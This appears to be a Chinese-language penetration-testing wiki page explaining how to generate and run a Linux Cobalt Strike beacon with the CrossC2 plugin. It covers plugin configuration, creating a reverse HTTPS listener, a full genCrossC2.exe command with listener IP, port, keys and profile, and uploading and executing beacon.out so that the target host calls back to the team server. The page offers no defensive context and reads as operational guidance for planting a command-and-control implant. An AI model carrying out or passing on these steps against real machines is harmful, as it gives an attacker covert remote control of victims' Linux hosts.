Cross2生成LinuxShell

前言

CobaltStrike本身并不支持生成linux类型的payload,此处我们需要借用CrossC2插件来生成,此插件目前仅支持HTTPS监听

我们可以在不同平台下使用CrossC2来生成payload

image-20231214165312243

步骤演示

1.下载CrossC2

此处我以在windows平台生成payload为例,首先在CobaltStrike目录新建一个CrossC2目录,并将.cobaltstrike.beacon_keys和CrossC2插件放进去,再将genCrossC2.Win.zip的文件解压至此目录

image-20231214165932408

2.修改插件并加载

修改CrossC2.cna的内容,将$CC2_PATH的值修改为CrossC2的根目录

$CC2_PATH = "E:\\HackerTools\\IntranetPenetration\\CobaltStrike\\CobaltStrike4.9\\CrossC2\\"; # <-------- fix
$CC2_BIN = "genCrossC2.exe";

在CobaltStrike客户端加载CrossC2插件

3.创建HTTPS监听

创建一个HTTPS类型的监听

点击右上角的CrossC2插件,创建一个反向HTTPS监听

image-20231214170655371

Listener要选择之前创建的HTTPS监听;由于我teamserver启动时指定了profile文件,因此此处也需指定;CS版本虽然只有小于或等于4.8的版本可选择,但是实测4.9也是可以用的

image-20231214172041962

4.生成payload

点击build后会在CobaltStrike根目录下生成一个beacon.out

除了在插件生成payload, 还可以在linux或windows使用命令行来生成, Linux的这里就不演示了,命令行格式为如下所示:

genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch> <output_file>

如下例子所示:

genCrossC2.exe 192.168.47.188 443 .cobaltstrike.beacon_keys ";;henry.profile" Linux x64 beacon.out
image-20231214204548405

5.执行payload

将生成的beacon.out上传至linux主机并赋予可执行权限, 随后执行

image-20231214172744322

beacon执行后,CobaltStrike显示目标主机上线

image-20231214173111039
上一页简单的内网信息收集下一页CNA插件开发

最后更新于